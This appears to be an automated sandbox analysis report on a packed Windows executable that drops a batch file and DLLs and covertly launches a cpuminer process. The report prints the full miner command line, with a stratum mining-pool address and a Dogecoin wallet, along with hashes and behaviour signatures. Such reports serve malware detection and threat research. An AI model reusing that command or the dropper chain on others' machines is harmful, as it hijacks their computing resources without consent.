Analysis

  • max time kernel
    295s
  • max time network
    302s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    12-02-2024 12:48

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Users\Admin\AppData\Local\Temp\B7B7.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\B7B7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B7B7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3516
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BAF3.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4996
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1516

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\B7B7.tmp\b2e.exe

    Filesize

    15.4MB

    MD5

    def27b86c4a3c101657c1481331b0e9d

    SHA1

    fde18d0dcd1318ff465941bde4ae8861308f057f

    SHA256

    7f76dbb4694b728825bb675c8c92c4d8def4247d4f984393af01ceb1fc4e0ca6

    SHA512

    29acfb5b0e6abf2d8b77f41791e425e288ca7281bdca2bbe64da52662180a24820975105ab448c5c7ea64e99db1b86cd971d80e13fef400029495ff13b8ef892

  • C:\Users\Admin\AppData\Local\Temp\B7B7.tmp\b2e.exe

    Filesize

    8.0MB

    MD5

    7279634f0e380860d67384613122a9b4

    SHA1

    5d0537b4005e31cc6f7a80cadd7ff60c58ba945c

    SHA256

    36f68e917f927c17c9e1aaf09c4f5daa592475d037272aeec658689c7a571678

    SHA512

    ab5ccebcc50e9af826b72764aed37a688c5a142badd8ce5ea388f9661ff373cd67ca4a7006f1217fb261fbe4c6454e369012caadc8ad2d0d6f7a874462800bac

  • C:\Users\Admin\AppData\Local\Temp\B7B7.tmp\b2e.exe

    Filesize

    10.0MB

    MD5

    1986ff4ccd4a47efd361224e101a4c15

    SHA1

    4ab073d9f0dfec1e822b742eb332220e8efe48e1

    SHA256

    87f627e4f982b64998012441ae90a38eda875d5b72f4273a03e995c3d041d212

    SHA512

    8733fddf938c274dfa9780721177675d024bea4a0a7c07fc27d7d54d4d4c6f82d3888052d5df19891769f68b9d40e5e3755c08eda45aed7fa0c0082d666a9262

  • C:\Users\Admin\AppData\Local\Temp\BAF3.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    576KB

    MD5

    6e18fc4eda8ed0e6aa6ed56f84803ab3

    SHA1

    e4a0a4432fcf3184baae1b01a8cb771ed580dbe2

    SHA256

    f51cf1f35d722b4af4bde30de5008d67d7256d271953eeb2ff63780978f4a53f

    SHA512

    25f97a3a07fd0aed4a5e6bd58e4cc3ebc2c56c0a314103536e9342ee10aa3c01baa24b459fb58d7154808594203e2b4fddc23f6c424182e2e8bb3a978b4dc256

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    384KB

    MD5

    eb8ea4d2595402528f73410e2c8651ed

    SHA1

    23abb385032a9317d00c826eb21e0fe6fc802c50

    SHA256

    fc3c5c1787c58c465ea47ab132afc59d209b1f7d319ae80a7913ed5c39157017

    SHA512

    7f4485a662859bdec898bb4f9675c8a834ab570ae7f4df2b6e95a9f5ab45f8fba612d04f0edfe22dc4bdcd3011af0536ed200731262056cd7bec332ce4b18573

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    128KB

    MD5

    0cfc533c46d2f160fc8d8483706228cf

    SHA1

    0d13ced09eeed5fc3879f418bda0410a742ab6a1

    SHA256

    510a6af4547083718b32dc00d4711cfff2aec0e7b936d4199feaaf32a7d5d3a6

    SHA512

    11e35867688e7814881981298b6f6948fceaf254d154f5429e5a82c43397b1894bd35fe7fb586b26e4272d8371c3b8e96c20c71ab05b9df3e851291444702a79

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    256KB

    MD5

    f8edb8dd2fb15f1887ace09587589dd4

    SHA1

    cbf7cbfefc0215d9500a98d9064deb9e86787152

    SHA256

    0465270288d69a0ec9beb7114707bed76756c14148293237d0d35423abdfc67b

    SHA512

    aa993112953225280c0bedb1ebd8288298b9c22a6a884a952ba60e48cbd21c4ce60724b7adc961a0528d7c569596e3420fec2670fc47c3eb6c00c691e0378abc

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    64KB

    MD5

    7fcedb6e973c5df3b6652a2afafa6a13

    SHA1

    116728803559ab58a8127544df80b75a0dd1c6d2

    SHA256

    fd7191afdecd35b78a0c0ca0457cbbf42ffda1e52263cd785abca5f047b18825

    SHA512

    05c86bf84079a2cc13dc7a1a917a0839ccd2b18e0440c4bd419c99f65c4161ac69a9447f56bdf6051b2fbbc49b7556fc3717432d0e293dfae2921c0701fe64fd

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    256KB

    MD5

    1d86b9560854472453237bcbaa2e253f

    SHA1

    5a03a7902d250377a3e9f746badcb696e2c98228

    SHA256

    1493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d

    SHA512

    afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    6.3MB

    MD5

    2cab1faae418dcee671da35da059b678

    SHA1

    994d860b79c5d9dc6e86ed4b45587629a760a859

    SHA256

    1960f01e30ae2805f229595e840f6a61cd9ea81772a58470575c45c4a522d60d

    SHA512

    a6e152649eaa9340a5dc95ee94a9592a246caece4d853ad7a5d19a20ff4da59ef084ef04400ae4af960a1ec5106b8d91fe3aec62f099bc0854c67ad17f4893f4

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    14KB

    MD5

    5c37dcf3e37dbc99177c5bcf977be61c

    SHA1

    44b8d5a15e30792b04ebbcd38b18779b66b5c07e

    SHA256

    29d05cc85bfba5e047fa07d67fd4832259ed2cd8e651e1d0719d6d1fe4ab1c5c

    SHA512

    7653829956b1e040b59d78d1b8d3efae81a65c906be1a5538d0ec6167af3fce5f0cfeaa506290d3ab23d192ff971a408c5b4a74736c83ba3ee9e6faa6b611d7d

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    64KB

    MD5

    6cccf65bd7d7ff5b53aeb882e15c462c

    SHA1

    a9822b63ad70c6085ed1deda0fbe4bc5fe555f3d

    SHA256

    1379cd6111c2c37cf16f2dd9b325118513e85c35543ba45e79deb504dd4c01d2

    SHA512

    c174b5f8615131c2b86c57aee166744ee1fe02ff7c916195f2fde06684f467545a3fa4f88083335e2045d12727d774279dc8672ec352de3095b729aa5d1dedcb

  • memory/1124-8-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/1516-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/1516-46-0x0000000073A60000-0x0000000073AF8000-memory.dmp

    Filesize

    608KB

  • memory/1516-45-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/1516-47-0x0000000001050000-0x0000000002905000-memory.dmp

    Filesize

    24.7MB

  • memory/1516-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-104-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-54-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-94-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-74-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-79-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-84-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1516-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3516-9-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3516-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB